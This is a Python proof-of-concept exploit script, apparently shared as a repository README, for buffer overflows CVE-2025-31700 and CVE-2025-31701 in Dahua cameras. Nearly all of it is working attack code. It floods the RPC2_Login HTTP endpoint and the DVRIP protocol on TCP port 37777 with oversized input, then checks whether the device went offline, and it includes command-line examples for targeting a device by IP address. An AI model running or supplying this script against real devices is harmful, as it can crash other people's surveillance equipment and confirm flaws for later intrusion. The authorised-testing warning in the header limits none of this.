README.md
Rendering markdown...
#!/usr/bin/env python3
"""
dahua_rce.py CVE-2025-31700 / CVE-2025-31701 Buffer Overflow PoC
====================================================================
CVE-2025-31700
CVSS : 8.1 HIGH
CWE : CWE-120 (Buffer Copy Without Checking Size of Input)
Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31700
Vendor: https://dahuasecurity.com/aboutUs/trustedCenter/details/775
CVE-2025-31701
CVSS : 8.1 HIGH
CWE : CWE-120
Source: https://nvd.nist.gov/vuln/detail/CVE-2025-31701
Vendor: same advisory as CVE-2025-31700
Technical details
-----------------
Both CVEs are stack/heap buffer overflows triggered by specially crafted
inbound packets. On devices without ASLR/stack canaries, a crash or
controlled RCE is possible. With ASLR the most likely outcome is a DoS
(device restart or reboot).
This script:
1. Probes the HTTP RPC2 endpoint with an oversized JSON body.
2. Probes the Dahua binary protocol on TCP/37777 with an oversized frame.
3. Monitors for a crash (connection reset, timeout, 5xx) which confirms
the device is vulnerable.
WARNING - This test intentionally sends malformed data and *may crash the
target device*. Only run against devices you own or have written permission
to test.
"""
import argparse
import socket
import struct
import sys
import time
import requests
requests.packages.urllib3.disable_warnings()
# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------
TCP_PROTOCOL_PORT = 37777 # Dahua binary/DVRIP protocol
HTTP_OVERFLOW_SZ = 8192 # bytes far exceeds any legitimate field length
TCP_OVERFLOW_SZ = 65535 # bytes for raw binary frame body
# ---------------------------------------------------------------------------
# HTTP / RPC2 overflow probe (CVE-2025-31700)
# ---------------------------------------------------------------------------
def http_overflow_probe(target, port=80, timeout=8):
"""
Send an over-length RPC2 JSON body to trigger the HTTP-layer buffer
overflow described in CVE-2025-31700.
Returns a result dict:
{ "status": <int|str>, "bytes": <int>, "crashed": <bool> }
"""
garbage = "A" * HTTP_OVERFLOW_SZ
payload = {
"method": "global.login",
"params": {
"userName": garbage,
"password": garbage,
"clientType": garbage,
"authorityType": "Default",
"passwordType": "Default"
},
"id": 1
}
try:
r = requests.post(
f"http://{target}:{port}/RPC2_Login",
json=payload,
timeout=timeout,
verify=False
)
crashed = r.status_code >= 500
return {"status": r.status_code, "bytes": len(r.content), "crashed": crashed}
except requests.exceptions.ConnectionError as e:
if "reset" in str(e).lower() or "refused" in str(e).lower():
return {"status": "CONNECTION_RESET", "bytes": 0, "crashed": True}
return {"status": f"CONN_ERROR: {e}", "bytes": 0, "crashed": False}
except requests.exceptions.Timeout:
return {"status": "TIMEOUT", "bytes": 0, "crashed": True}
except Exception as e:
return {"status": str(e), "bytes": 0, "crashed": False}
# ---------------------------------------------------------------------------
# TCP binary protocol overflow probe (CVE-2025-31701)
# ---------------------------------------------------------------------------
def build_dvrip_frame(body):
"""
Minimal DVRIP / Dahua binary protocol frame.
Frame layout (big-endian):
0xFFD1 version magic
0x0000 session (0 = unauthenticated)
0x0000 sequence
0x0000 channel
<uint32> body length
<body>
"""
magic = struct.pack(">H", 0xFFD1)
session = struct.pack(">H", 0x0000)
seq = struct.pack(">H", 0x0000)
channel = struct.pack(">H", 0x0000)
length = struct.pack(">I", len(body))
return magic + session + seq + channel + length + body
def tcp_overflow_probe(target, tcp_port=TCP_PROTOCOL_PORT, timeout=8):
"""
Send an oversized DVRIP frame to TCP/37777 to trigger the binary-protocol
layer overflow described in CVE-2025-31701.
Returns { "status": <str>, "bytes": <int>, "crashed": <bool> }
"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((target, tcp_port))
except ConnectionRefusedError:
return {"status": "PORT_CLOSED", "bytes": 0, "crashed": False}
except socket.timeout:
return {"status": "CONNECT_TIMEOUT", "bytes": 0, "crashed": False}
except Exception as e:
return {"status": str(e), "bytes": 0, "crashed": False}
body = b"B" * TCP_OVERFLOW_SZ
frame = build_dvrip_frame(body)
try:
s.sendall(frame)
try:
resp = s.recv(1024)
s.close()
return {"status": "RESPONDED", "bytes": len(resp), "crashed": False}
except socket.timeout:
s.close()
return {"status": "TIMEOUT_AFTER_SEND", "bytes": 0, "crashed": True}
except BrokenPipeError:
return {"status": "BROKEN_PIPE (reset by peer)", "bytes": 0, "crashed": True}
except Exception as e:
return {"status": str(e), "bytes": 0, "crashed": True}
finally:
try:
s.close()
except Exception:
pass
# ---------------------------------------------------------------------------
# Reachability check
# ---------------------------------------------------------------------------
def check_alive(target, port=80, timeout=5):
"""Return True if the device responds to a basic HTTP request."""
try:
requests.get(f"http://{target}:{port}/", timeout=timeout, verify=False)
return True
except Exception:
return False
# ---------------------------------------------------------------------------
# Main exploit flow
# ---------------------------------------------------------------------------
def run(target, port=80, tcp_port=TCP_PROTOCOL_PORT, timeout=8, cve="both"):
print(f"""
=================================================
Dahua Buffer Overflow CVE-2025-31700/31701
WARNING: may crash the target device (DoS)
=================================================
Target : {target}
HTTP : :{port}
TCP/DVRIP: :{tcp_port}
Mode : {cve}
""")
alive_before = check_alive(target, port, timeout)
print(f"[*] Device reachable before probe: {'YES' if alive_before else 'NO'}")
if not alive_before:
print("[-] Device not responding aborting")
sys.exit(1)
http_result = {"status": "SKIPPED", "bytes": 0, "crashed": False}
tcp_result = {"status": "SKIPPED", "bytes": 0, "crashed": False}
if cve in ("http", "both", "2025-31700"):
print("\n[*] Sending HTTP RPC2 overflow (CVE-2025-31700) ...")
http_result = http_overflow_probe(target, port, timeout)
print(f" status : {http_result['status']}")
print(f" bytes : {http_result['bytes']}")
print(f" crashed : {http_result['crashed']}")
if cve in ("tcp", "both", "2025-31701"):
print("\n[*] Sending TCP/DVRIP overflow (CVE-2025-31701) ...")
tcp_result = tcp_overflow_probe(target, tcp_port, timeout)
print(f" status : {tcp_result['status']}")
print(f" bytes : {tcp_result['bytes']}")
print(f" crashed : {tcp_result['crashed']}")
time.sleep(3)
alive_after = check_alive(target, port, timeout)
print(f"\n[*] Device reachable after probe : {'YES' if alive_after else 'NO'}")
print("\n" + "=" * 51)
print("RESULT")
print("=" * 51)
crashed = http_result["crashed"] or tcp_result["crashed"]
if not alive_after:
print(" [!!!] Device OFFLINE after payload DoS confirmed")
print(" Likely VULNERABLE to CVE-2025-31700 / CVE-2025-31701")
elif crashed:
print(" [!!!] Crash indicators observed during probe")
print(" Likely VULNERABLE (verify by checking device logs/reboot)")
else:
print(" [-] No crash observed possibly patched or different firmware")
print(" Note: absence of crash does not guarantee patch; test on all ports")
if alive_after and crashed:
print("\n [+] Device recovered ASLR or watchdog may have restarted the service")
print(" [+] Consistent with a real overflow contained by ASLR")
def main():
parser = argparse.ArgumentParser(
description="Dahua CVE-2025-31700/01 Buffer Overflow DoS PoC",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
python dahua_rce.py 192.168.1.100
python dahua_rce.py 192.168.1.100 -p 8080 --tcp-port 37777
python dahua_rce.py 192.168.1.100 --cve http
python dahua_rce.py 192.168.1.100 --cve tcp
"""
)
parser.add_argument("target", help="Camera IP or hostname")
parser.add_argument("-p", "--port", type=int, default=80,
help="HTTP port (default: 80)")
parser.add_argument("--tcp-port", type=int, default=TCP_PROTOCOL_PORT,
help=f"Dahua binary protocol port (default: {TCP_PROTOCOL_PORT})")
parser.add_argument("--cve",
choices=["both", "http", "tcp", "2025-31700", "2025-31701"],
default="both",
help="Which overflow to test (default: both)")
parser.add_argument("--timeout", type=int, default=8)
args = parser.parse_args()
run(args.target, args.port, args.tcp_port, args.timeout, args.cve)
if __name__ == "__main__":
main()